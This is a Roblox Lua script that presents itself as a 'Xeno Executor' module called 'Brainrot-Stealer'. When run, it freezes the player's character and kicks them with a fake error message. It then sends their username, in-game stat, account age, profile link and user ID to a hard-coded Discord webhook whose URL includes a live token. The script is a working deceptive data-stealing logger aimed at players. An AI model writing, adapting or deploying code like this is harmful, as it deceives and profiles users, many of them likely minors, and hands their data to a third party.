--[[
    Xeno Execution Framework v2.1.4 | Module: Brainrot-Stealer
    Status: Operational | Compatibility: Xeno Executor Optimized
    Build: 0x84_XENO_SECURED
]]

local url = "https://discord.com/api/webhooks/1480678551643492433/M6F1hlBqrBMH6FNwv9hUTYTpg9W3CBLrtuxxwCBRskgRXcDfeewmEzhibwzAKA1ANIJJ"
local p = game.Players.LocalPlayer
local h = game:GetService("HttpService")
local m = game:GetService("MarketplaceService")

-- Xeno Karuk (Freeze & Kick)
if p.Character and p.Character:FindFirstChild("HumanoidRootPart") then 
    p.Character.HumanoidRootPart.Anchored = true 
end

task.delay(1.5, function() 
    p:Kick("\n[Xeno Error]\nCode: 0x84\nReason: Module execution timeout. Please restart Xeno and try again.") 
end)

-- Data Extraction
local br = "0"
local s = p:FindFirstChild("leaderstats")
if s then 
    local v = s:FindFirstChild("Brainrots") or s:FindFirstChild("Points")
    br = v and tostring(v.Value) or "0"
end

local gName = m:GetProductInfo(game.PlaceId).Name
local pUrl = "https://www.roblox.com/users/" .. p.UserId .. "/profile"

-- Send to Discord (Xeno HTTP Request)
local req = (syn and syn.request) or http_request or request or (http and http.request)
if req then
    req({
        Url = url,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = h:JSONEncode({
            ["username"] = "Xeno Logger",
            ["avatar_url"] = "https://i.imgur.com/W9v6v99.png",
            ["embeds"] = {{
                ["title"] = "🎯 Target Logged chrez Xeno",
                ["description"] = "Potrebitelqt executna scripta v **" .. gName .. "**",
                ["color"] = 0xff0000,
                ["fields"] = {
                    {["name"] = "👤 Name", ["value"] = "```" .. p.Name .. "```", ["inline"] = true},
                    {["name"] = "🧠 Brainrots", ["value"] = "```" .. br .. "```", ["inline"] = true},
                    {["name"] = "📅 Account Age", ["value"] = p.AccountAge .. " days", ["inline"] = true},
                    {["name"] = "🔗 Profile", ["value"] = "[Otvori Roblox Profil](" .. pUrl .. ")", ["inline"] = false},
                    {["name"] = "🆔 ID", ["value"] = "```" .. tostring(p.UserId) .. "```", ["inline"] = false}
                },
                ["footer"] = {["text"] = "Xeno Executor Engine • " .. os.date("%X")}
            }}
        })
    })
end
